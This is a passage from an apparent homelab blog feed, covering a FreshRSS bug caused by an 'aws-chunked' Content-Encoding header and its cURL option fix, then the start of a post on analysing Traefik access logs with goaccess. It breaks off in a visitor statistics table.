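placeholder for the channel&rsquo;s ID, which can e.g. be found in the channel page&rsquo;s source:</p>
<pre tabindex="0"><code>https://www.youtube.com/feeds/videos.xml?channel_id=CHANNEL_ID
</code></pre>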
<h2 id="open-sourcery">Open Sourcery</h2>
<p>While working on setting up FreshRSS, I was again reminded why I love Open Source.
One of the blogs I read wasn&rsquo;t getting added to FreshRSS. When trying to add it,
I was getting this error in the logs:</p>
<pre tabindex="0"><code>A feed could not be found at `https://blog.example.com/index.xml`; the status code is `200` and content-type is `` [https://blog.example.com/index.xml]
</code></pre><p>That was pretty weird, for two reasons: One, Brief didn&rsquo;t have any issues adding
this blog and handled it perfectly fine. And two, the blog is set up very similarly
to mine - running Hugo, even with the same theme, backed by a Ceph S3 bucket, and
fronted by a Traefik instance. Even the Traefik setups are pretty similar. And
yet, my blog worked fine in FreshRSS, and the other blog also worked fine in Brief.</p>
<p>The next thing I tried was appending <code>#force_feed</code> to the feed URL, as proposed
in some FreshRSS issues for cases where the feed wasn&rsquo;t getting added properly.
That resulted in an error again, but this time with a different message:</p>
<pre tabindex="0"><code>A feed could not be found at `https://blog.example.com/index.xml`. Empty body. [https://blog.example.com/index.xml#force_feed]
</code></pre><p>Empty body? I went ahead and curl&rsquo;ed the <code>index.xml</code>. It worked perfectly fine,
no complaints. The content also looked fine. I verified that with the
<a href="https://validator.w3.org/feed/">W3C Feed Validator</a>, and while it showed a few
warnings, it didn&rsquo;t have any major issues with the feed either.</p>
<p>Checking the cURL output a few more times, I started comparing it to the output
for my blog - as I said, our setups are pretty similar. And I finally found the
one major difference: the blog which wasn&rsquo;t working in FreshRSS was sending
a <code>Content-Encoding: aws-chunked</code> header, while mine wasn&rsquo;t. According to that
header&rsquo;s <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Content-Encoding">docs</a>,
it is intended to indicate the compression algorithm used, and <code>aws-chunked</code>
isn&rsquo;t among the values normally allowed for it.</p>
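<p>The difference is easy to spot when only looking at the response headers. This is
a hedged sketch of the comparison, with <code>blog.example.com</code> standing in for the
affected blog:</p>
<pre tabindex="0"><code>curl -sI https://blog.example.com/index.xml | grep -i &#39;^content-encoding&#39;
# content-encoding: aws-chunked
curl -sI https://blog.mei-home.net/index.xml | grep -i &#39;^content-encoding&#39;
# (no output, the header is not set)
</code></pre>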
<p>I assumed that the issue was somehow related to the fact that the blog was delivered
from a Ceph S3 bucket, but wasn&rsquo;t able to figure out anything more. But I did
wonder why curl&rsquo;ing on the command line worked without issue while FreshRSS had
problems. And here is why I love Open Source software: instead of only being able to file
an issue with the project, I was able to check what was wrong myself.</p>
<p>FreshRSS has good <a href="https://freshrss.github.io/FreshRSS/en/developers/02_First_steps.html">developer documentation</a>.
I cloned the repository, and then launched a test instance like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>podman run --rm<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -p 8080:80<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e FRESHRSS_ENV<span style="color:#f92672">=</span>development<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e TZ<span style="color:#f92672">=</span>Europe/Paris<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -e <span style="color:#e6db74">&#39;CRON_MIN=1,31&#39;</span><span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -v <span style="color:#66d9ef">$(</span>pwd<span style="color:#66d9ef">)</span>:/var/www/FreshRSS<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  -v freshrss_data:/var/www/FreshRSS/data<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  --name freshrss<span style="color:#ae81ff">\
</span></span></span><span style="display:flex;"><span><span style="color:#ae81ff"></span>  freshrss/freshrss:edge
</span></span></code></pre></div><p>I don&rsquo;t speak PHP at all, but I was still able to litter a few print statements
around the code, and finally figured out that after trying to fetch the <code>index.xml</code>,
the body of the response was indeed empty. That&rsquo;s why the initial attempt said
that there was no feed found, and why the attempt with <code>#force_feed</code> showed an
<code>Empty body</code> error.</p>
<p>Then I looked at the actual fetching code <a href="https://github.com/FreshRSS/FreshRSS/blob/fdd82820f16733b6e07def5b590fd94879e5a520/lib/simplepie/simplepie/src/File.php#L89">here</a>. The interesting part was <a href="https://github.com/FreshRSS/FreshRSS/blob/fdd82820f16733b6e07def5b590fd94879e5a520/lib/simplepie/simplepie/src/File.php#L146-L154">this</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php5" data-lang="php5"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">===</span> <span style="color:#a6e22e">CURLE_WRITE_ERROR</span> <span style="color:#f92672">||</span> <span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">===</span> <span style="color:#a6e22e">CURLE_BAD_CONTENT_ENCODING</span>) {
</span></span><span style="display:flex;"><span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">error</span> <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;cURL error &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">curl_errno</span>($fp) <span style="color:#f92672">.</span> <span style="color:#e6db74">&#39;: &#39;</span> <span style="color:#f92672">.</span> <span style="color:#a6e22e">curl_error</span>($fp); <span style="color:#75715e">// FreshRSS
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">on_http_response</span>($responseBody <span style="color:#f92672">===</span> <span style="color:#66d9ef">false</span> <span style="color:#f92672">?</span> <span style="color:#66d9ef">false</span> <span style="color:#f92672">:</span> $responseHeaders <span style="color:#f92672">.</span> $responseBody, $curl_options);
</span></span><span style="display:flex;"><span>    $this<span style="color:#f92672">-&gt;</span><span style="color:#a6e22e">error</span> <span style="color:#f92672">=</span> <span style="color:#66d9ef">null</span>; <span style="color:#75715e">// FreshRSS
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    <span style="color:#a6e22e">curl_setopt</span>($fp, <span style="color:#a6e22e">CURLOPT_ENCODING</span>, <span style="color:#e6db74">&#39;none&#39;</span>);
</span></span><span style="display:flex;"><span>    $responseHeaders <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;&#39;</span>;
</span></span><span style="display:flex;"><span>    $responseBody <span style="color:#f92672">=</span> <span style="color:#a6e22e">curl_exec</span>($fp);
</span></span><span style="display:flex;"><span>    $responseHeaders <span style="color:#f92672">.=</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\r\n</span><span style="color:#e6db74">&#34;</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>In my tests, FreshRSS runs into this <code>if</code> condition with the <code>CURLE_BAD_CONTENT_ENCODING</code> error.
Printing the <code>$this-&gt;error</code> value gives this result:</p>
<pre tabindex="0"><code>cURL error 61: Unrecognized content encoding type. libcurl understands deflate, gzip, br, zstd content encodings
</code></pre><p>Checking further and printing the <code>$responseHeaders</code> value shows that the
<code>Content-Encoding</code> header is present here as well:</p>
<pre tabindex="0"><code>HTTP/2 200
accept-ranges: bytes
content-encoding: aws-chunked
content-type: application/rss+xml
date: Tue, 30 Dec 2025 22:50:37 GMT
etag: &#34;xxx&#34;
last-modified: Sat, 13 Dec 2025 21:23:42 GMT
server: Ceph Object Gateway (squid)
x-amz-meta-md5chksum: xxx
content-length: 11242
</code></pre><p>The original intention of this code seems to have been to disable content decoding
in case there was an encoding error, the expectation being that the second
<code>curl_exec</code> call would then succeed. But it just returned the same error
again and, importantly, did not set the body. Crucially for the rest of the
fetching code, it still stored the HTTP status code - which was &ldquo;200&rdquo;. So all
following code assumed that the fetch was successful.</p>
<p>Then I looked at the documentation for the <code>CURLOPT_ENCODING</code> option, which is
set to <code>&#39;none&#39;</code> in the above code. It turns out that it was obsoleted by the
<a href="https://curl.se/libcurl/c/CURLOPT_ACCEPT_ENCODING.html">CURLOPT_ACCEPT_ENCODING option</a>
a long time ago, and that <code>&#39;none&#39;</code> isn&rsquo;t actually a valid value. When this option
is set, cURL will always try to decompress the response, as it assumes
that it needs to. But it also always checks whether it actually has support
for the <code>Content-Encoding</code> value in the response, and if it doesn&rsquo;t, it reports the
above error.</p>
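<p>The same behaviour can be reproduced with the curl CLI. This is a hedged sketch,
again with <code>blog.example.com</code> standing in for the affected blog: without <code>--compressed</code>,
curl doesn&rsquo;t try to decode the body and the request succeeds; with <code>--compressed</code>,
libcurl&rsquo;s automatic decoding is enabled, and the request should fail with the same
error 61 shown above:</p>
<pre tabindex="0"><code>curl -s https://blog.example.com/index.xml -o /dev/null; echo $?
# 0
curl -s --compressed https://blog.example.com/index.xml -o /dev/null; echo $?
# 61
</code></pre>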
<p>But it looked to me like FreshRSS already had this specific branch of the code
to handle exactly this issue, it just didn&rsquo;t work (anymore?). Reading through
the option&rsquo;s docs, it seemed that the option instead needs to be set to <code>null</code>
to completely disable the handling. So I changed the <code>CURLOPT_ENCODING</code> option
from <code>&#39;none&#39;</code> to <code>null</code>. And now the feed was added without any issue.</p>
<p>Open source is an absolutely amazing thing.</p>
<p>I also created a ticket on FreshRSS <a href="https://github.com/FreshRSS/FreshRSS/issues/8374">here</a>,
and my fix has already been merged and should find its way into the next FreshRSS
release.</p>
<p>That was a very satisfying investigation. &#x1f642;</p>
<p>Concerning the actual issue with sending the header: After some discussion with
the author of the blog, we were able to figure out that the one difference in
our setups is that I&rsquo;m using <code>s3cmd</code> to push the files generated by Hugo to the
S3 bucket, while they&rsquo;re using Hugo&rsquo;s <a href="https://gohugo.io/host-and-deploy/deploy-with-hugo-deploy/">deploy</a>
feature. As best as we could tell, the AWS SDK used by Hugo automatically
sets the header when pushing to a bucket. AWS S3 then just uses the header during
the PUT operation, but doesn&rsquo;t store the fact that the header was set. So it will
not be returned as part of a response. But Ceph S3 seems to behave differently,
and when the <code>Content-Encoding</code> header is set during the push, it will also be
returned as part of the response to a GET request.</p>
<p>And that&rsquo;s it for this one. I hope you all made it safely into 2026, and I
wish you all a happy new year. &#x1f642;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Goaccess: A CLI Tool for Webserver Access Log Analysis</title>
      <link>https://blog.mei-home.net/posts/go-access/</link>
      <pubDate>Sat, 03 Jan 2026 12:50:10 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/go-access/</guid>
      <description>A short one about a small CLI tool for analyzing access logs of webservers in the terminal</description>
      <content:encoded><![CDATA[<p>Wherein I talk about a small tool for access log analysis on the terminal.</p>
<p>I recently re-discovered a small tool I already came across a while ago, but never
wrote a post about: <a href="https://goaccess.io/">Goaccess</a>. It&rsquo;s a command line tool
which can be used to do quick analysis of web server access logs. It understands
some of the standard formats from e.g. Apache out of the box, but also provides
facilities to parse other log formats. In this post, I will use it to parse 30 GB
worth of logs from my public-facing Traefik instance and see what I can get out
of it.</p>
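<p>For a quick impression of the tool: for a webserver writing the standard combined
log format, an invocation can be as simple as this, using goaccess&rsquo; predefined
<code>COMBINED</code> format (the log path is just an example):</p>
<pre tabindex="0"><code>goaccess /var/log/apache2/access.log --log-format=COMBINED
</code></pre>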
<p>The first step was getting the Traefik logs. While I do also have them in my
Loki instance, those are only the ones from the last year. But it turns out
that I never deleted the logs on the host. &#x1f926; Luckily it has a large enough
disk. I ended up with 30 GB of logs, ranging from March 2023 to December 2025.</p>
<p>Before showing you the results, one weird thing while copying the file to my
laptop: it was incredibly slow. Sure, it was 30 GB worth of logs, but I was
sitting behind a 1 Gbps connection, and yet it was only coming down the pipe
at a bit over 5 MB/s. I tried to figure out why. No internal
network connection in the Homelab was overloaded. Neither was the CPU of the Pi
I was copying the file from. And only just now, as I&rsquo;m typing this, am I realizing
that it&rsquo;s not some SSH/rsync inefficiency or the slow Pi 4 CPU. No, it&rsquo;s of course
my network connection back home. That&rsquo;s not 1 Gbps, but rather 250 Mbps down
and - you probably guessed it already - 40 Mbps up. &#x1f926;
So absolutely nothing wrong with that at all. I was just being a bit thick for
a moment there.</p>
<p>The first issue I had was how to parse the logs, as I had configured JSON output
for my Traefik instance, and all the pre-configured log formats are standard
line formats, not JSON. But after a bit of googling, I came across <a href="https://github.com/allinurl/goaccess/issues/2757">this GitHub issue</a>,
more specifically, <a href="https://github.com/allinurl/goaccess/issues/2757#issuecomment-2508053539">this comment</a>.
It showed how to set up goaccess&rsquo; <a href="https://goaccess.io/man#custom-log">log-format option</a>
to work with Traefik&rsquo;s JSON output format. Here&rsquo;s an example log line:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span><span style="color:#ae81ff">2023-03-02</span><span style="color:#960050;background-color:#1e0010">T</span><span style="color:#ae81ff">22</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">22</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">0</span><span style="color:#ae81ff">7.136593921</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#ae81ff">01</span><span style="color:#960050;background-color:#1e0010">:</span><span style="color:#ae81ff">00</span> <span style="color:#960050;background-color:#1e0010">stdout</span> <span style="color:#960050;background-color:#1e0010">F</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientAddr&#34;</span>:<span style="color:#e6db74">&#34;10.88.0.1:55130&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientHost&#34;</span>:<span style="color:#e6db74">&#34;10.88.0.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientPort&#34;</span>:<span style="color:#e6db74">&#34;55130&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;ClientUsername&#34;</span>:<span style="color:#e6db74">&#34;-&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;DownstreamContentSize&#34;</span>:<span style="color:#ae81ff">19</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;DownstreamStatus&#34;</span>:<span style="color:#ae81ff">404</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Duration&#34;</span>:<span style="color:#ae81ff">149256</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;Overhead&#34;</span>:<span style="color:#ae81ff">149256</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestAddr&#34;</span>:<span style="color:#e6db74">&#34;127.0.0.1:443&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestContentSize&#34;</span>:<span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestCount&#34;</span>:<span style="color:#ae81ff">1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestHost&#34;</span>:<span style="color:#e6db74">&#34;127.0.0.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestMethod&#34;</span>:<span style="color:#e6db74">&#34;GET&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestPath&#34;</span>:<span style="color:#e6db74">&#34;/&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestPort&#34;</span>:<span style="color:#e6db74">&#34;443&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestProtocol&#34;</span>:<span style="color:#e6db74">&#34;HTTP/1.1&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RequestScheme&#34;</span>:<span style="color:#e6db74">&#34;http&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;RetryAttempts&#34;</span>:<span style="color:#ae81ff">0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;StartLocal&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T22:22:07.136056394+01:00&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;StartUTC&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T21:22:07.136056394Z&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;request_User-Agent&#34;</span>:<span style="color:#e6db74">&#34;curl/7.81.0&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;time&#34;</span>:<span style="color:#e6db74">&#34;2023-03-02T22:22:07+01:00&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The first issue to solve was the prefix added by Podman because that&rsquo;s where the
Traefik server is running. Another is that the log is mixed, so it doesn&rsquo;t just
contain access log lines like the above, but also other messages from Traefik.
I&rsquo;m working with the following to get only the access logs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>grep -a <span style="color:#e6db74">&#34;ClientAddr&#34;</span> traefik.log | cut -d <span style="color:#e6db74">&#39; &#39;</span> -f4- &gt; cleaned.log
</span></span></code></pre></div><p>Here, <code>traefik.log</code> is the original log file. I&rsquo;m filtering for lines containing <code>ClientAddr</code>,
which will be the access logs. And I&rsquo;m keeping everything from the fourth field
onwards, which drops Podman&rsquo;s prefix and leaves only the actual access log JSON.
The <code>-</code> at the end of <code>-f4-</code> is load bearing: it tells <code>cut</code> to output field 4
and everything after it, instead of just field 4 itself. Without it, user agent
strings with spaces in them will be cut off, so that the
access log part of the line will be incomplete, lacking the final <code>time</code> member
and the closing brace.</p>
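<p>A small, hypothetical example illustrates the difference between <code>-f4</code> and <code>-f4-</code>:</p>
<pre tabindex="0"><code>$ echo &#39;prefix1 prefix2 prefix3 {&#34;UA&#34;:&#34;Mozilla/5.0 (X11; Linux)&#34;}&#39; | cut -d &#39; &#39; -f4
{&#34;UA&#34;:&#34;Mozilla/5.0
$ echo &#39;prefix1 prefix2 prefix3 {&#34;UA&#34;:&#34;Mozilla/5.0 (X11; Linux)&#34;}&#39; | cut -d &#39; &#39; -f4-
{&#34;UA&#34;:&#34;Mozilla/5.0 (X11; Linux)&#34;}
</code></pre>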
<p>With that done, here is the command for analyzing the resulting logs with
goaccess:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">8</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> cleaned.log
</span></span></code></pre></div><p>Running that command will analyze the log file in its entirety and then show
goaccess&rsquo; ncurses UI:</p>
<figure>
    <img loading="lazy" src="dashboard.png"
         alt="A screenshot of the goaccess terminal UI. Here, I will only provide an overview of the goaccess UI and what&#39;s shown in it. I will properly show and discuss my own data later in this post. At the top, it shows a number of general statistics, including for example the fact that it read 28 million requests, for 484k different files, with a total transfer amount of 732 GB. Next come multiple sections with data tables. The first one is the number of unique visitors per day. It shows the days sorted chronologically, showing the 7 most recent days, from 2025-12-27 with only 850 hits and 253 visitors down to 2025-12-21, with 31199 hits and 3042 visitors. Next come the requested files. This time, the table is ordered by number of hits. The most hit URL, with 8.9 million hits, is /inbox, which is part of the Mastodon API. Next comes &#39;/&#39;, with 2.7 million hits. At the bottom, it shows &#39;/users/mmeier&#39;, again from the Mastodon API, with 462k hits. After this table follows the &#39;Static Requests&#39; one, which specifically shows results for static files like figures, CSS or JS files. Here, the dominant file is the png for my Mastodon profile picture, with 76k requests. The last visible table is the &#39;Not found URLs&#39; table, which shows that 35k hits tried to visit &#39;/&#39;, but got a 404 for their troubles."/> <figcaption>
            <p>Top of the goaccess ncurses UI</p>
        </figcaption>
</figure>

<p>The next page looks like this:
<figure>
    <img loading="lazy" src="dashboard-second-page.png"
         alt="A continuation of the previous screenshot, now showing the next few sections. The first one visible is the &#39;Visitor Hostnames and IPs&#39; section. It clearly shows that my internal usage dominates. The top IP is &#39;10.86.1.60&#39;, which is my desktop machine. It accounts for 3.5 million hits, 12% of the total. A lot of the other 6 IPs shown are also local network IPs from the 10.86.0.0/16 range. Then comes the operating systems table, showing that 30% of my hits are coming from Unix-like systems. Then come the browsers, where Feeds is at the top. I will explain the meaning here a bit more in the next section. The last table only half-visible, is &#39;Time distribution&#39;, which shows when most hits arrive. It is again sorted chronologically, showing that 5.2%, or 1.4 million hits, come in between 00:00 and 01:00, UTC."/> <figcaption>
            <p>The next set of sections in the goaccess UI.</p>
        </figcaption>
</figure>
</p>
<p>And finally, here is the final set of tables:
<figure>
    <img loading="lazy" src="dashboard-page-three.png"
         alt="A continuation of the previous screenshots, now showing the last few tables. The first one is the &#39;Virtual hosts&#39; table. It shows that the majority of hits, 18 million or 63% of the total, went to my Mastodon instance at social.mei-home.net. Followed by my Nextcloud instance at cloud.mei-home.net. Then comes the &#39;Referring Sites&#39; table, which is completely empty. It&#39;s followed by the &#39;HTTP Status Codes&#39; table, which is topped by 92.78% of all requests which got a 2xx status code. another 4.2% were client errors. The final section is &#39;Remote User (HTTP Authentication)&#39;. It shows only &#39;-&#39; with 99.96%. I cut out the remaining lines, as they would show valid usernames in my infrastructure."/> <figcaption>
            <p>The final set of sections in the UI.</p>
        </figcaption>
</figure>
</p>
<p>In the above screenshot, the &ldquo;Referring Sites&rdquo; table is entirely empty, as I&rsquo;m
not logging any referrers.</p>
<p>In addition to showing an interactive ncurses interface like this,
goaccess can also generate an HTML version of the analysis, which
looks like this:
<figure>
    <img loading="lazy" src="html-report-example.png"
         alt="Another screenshot, this time of a browser window. The opened page shows a few stats at the top, namely exactly the same values as were at the top of the terminal UI, e.g. Failed Requests or Unique visitors. Below those stats are then the same sections as before. But where the terminal UI only had tables with the data, the HTML variant has charts as well."/> <figcaption>
            <p>The HTML variant of the report. The main difference is that the HTML version is able to show charts in addition to tables.</p>
        </figcaption>
</figure>
</p>
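<p>The HTML report is generated by pointing goaccess&rsquo; output option at an <code>.html</code>
file, e.g. like this (with the same format options as above, abbreviated here):</p>
<pre tabindex="0"><code>goaccess cleaned.log --log-format=&#39;...&#39; --date-format=&#39;%Y-%m-%d&#39; --time-format=&#39;%T%z&#39; -o report.html
</code></pre>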
<p>There&rsquo;s one more feature I&rsquo;d like to mention before getting to my own data: storing
and re-using results. Although to be honest, I&rsquo;m not really sure how useful it is. With this
feature, the preprocessed data can be stored on disk, so that the next invocation
of goaccess doesn&rsquo;t need to parse all of the logs again. On my laptop, with an
8-core AMD Ryzen 4900HS and the &ldquo;--jobs 8&rdquo; option I showed above, it takes about
250 seconds to churn through 28 million requests in a 30 GB log file. To store
the data in a database, append <code>--persist --db-path /some/dir</code> to the goaccess
invocation. This will store the analyzed data. It can then be re-used with a
command like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">8</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> --db-path /some/path --restore
</span></span></code></pre></div><p>Initially, I was missing the <code>-</code> at the end of the <code>cut -d &#39; &#39; -f4-</code> part of my
extraction command, which led to the JSON logs being cut off due to spaces in
the user agent string. The result was that the overwhelming majority of log lines were
rejected by goaccess. To analyze such issues, you can add the option <code>--invalid-requests=./invalid.log</code>
to the command. All rejected log lines will be written into that file.</p>
<p>And finally, I would advise working with the commands as I&rsquo;ve given them here,
first filtering the log lines, writing them into a new file and then providing
that file to the goaccess invocation. Do not do this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>grep -a <span style="color:#e6db74">&#34;ClientAddr&#34;</span> traefik.log | cut -d <span style="color:#e6db74">&#39; &#39;</span> -f4- &gt; cleaned.log | goaccess...
</span></span></code></pre></div><p>I found that this is rather slow, when compared to providing a pre-filtered file.</p>
<h2 id="analyzing-my-data-a-bit">Analyzing my data a bit</h2>
<p>With the tool&rsquo;s basic functionality out of the way, let&rsquo;s have a closer look at
my data. For a bit of context, the Traefik instance this data is coming from is
not my Kubernetes Ingress Controller instance. Instead, this is the instance
fronting external access. Everything that comes in from the public internet goes
through this Traefik instance, running on a mostly firewalled-off Pi. There&rsquo;s
still some internal traffic going through there as well though, as I&rsquo;m also
pointing the internal DNS for those publicly visible services to this &ldquo;bastion&rdquo;
Traefik instance instead of the k8s Ingress. I mostly do this to have an easy
way to make sure my public facing stuff actually works.</p>
<p>I created the data from a Traefik JSON log file pre-filtered to contain only the access
logs like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>goaccess --jobs <span style="color:#ae81ff">12</span> --log-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;{&#34;ClientHost&#34;: &#34;%h&#34;, &#34;ClientUsername&#34;: &#34;%e&#34;, &#34;DownstreamContentSize&#34;: &#34;%b&#34;, &#34;DownstreamStatus&#34;: &#34;%s&#34;, &#34;Duration&#34;: &#34;%n&#34;, &#34;RequestHost&#34;: &#34;%v&#34;, &#34;RequestMethod&#34;: &#34;%m&#34;, &#34;RequestPath&#34;: &#34;%U&#34;, &#34;RequestProtocol&#34;: &#34;%H&#34;, &#34;request_Referer&#34;:&#34;%R&#34;, &#34;request_User-Agent&#34;:&#34;%u&#34;, &#34;time&#34;: &#34;%dT%t&#34;}&#39;</span> --date-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%Y-%m-%d&#39;</span> --time-format<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;%T%z&#39;</span> --invalid-requests<span style="color:#f92672">=</span>./invalid.log --unknowns-log<span style="color:#f92672">=</span>./unknowns.log -e 10.0.0.0-10.255.255.255 -r
</span></span></code></pre></div><p>The change in the <code>--jobs</code> value comes from the fact that I&rsquo;m back home now and
on my beefier desktop machine. I&rsquo;m also providing two additional files for goaccess
to write problematic logs to. The <code>--invalid-requests</code> option directs log lines
which goaccess couldn&rsquo;t parse to a separate file. The <code>--unknowns-log</code> redirects
unknown user agents into a separate file. In my case, those are mostly Prometheus
and Uptime-Kuma, as well as Gatus and a number of Fediverse servers.
Finally, I&rsquo;m also excluding my local IP range, with <code>-e 10.0.0.0-10.255.255.255</code>.
That&rsquo;s because for this analysis, I was only interested in external traffic.</p>
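<p>To get a quick overview of which user agents ended up in the unknowns log, the
usual sort/uniq pipeline works; a hedged sketch, assuming roughly one entry per line:</p>
<pre tabindex="0"><code>sort unknowns.log | uniq -c | sort -rn | head
</code></pre>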
<p>The finished analysis shows a total of 28 million requests, ranging from
2023-03-04 to 2025-12-27. About eight million of those are local accesses, so
they got excluded from the rest of the analysis. Only 1469 log lines were unparsable.</p>
<p>Here is the table of unique visitors per day, which goaccess computes from the
combination of user agent and source IP:</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">Visitors</th>
          <th style="text-align: right">Percentage of Total Visitors</th>
          <th style="text-align: right">Requests</th>
          <th style="text-align: right">Transferred Data</th>
          <th style="text-align: right">Day</th>
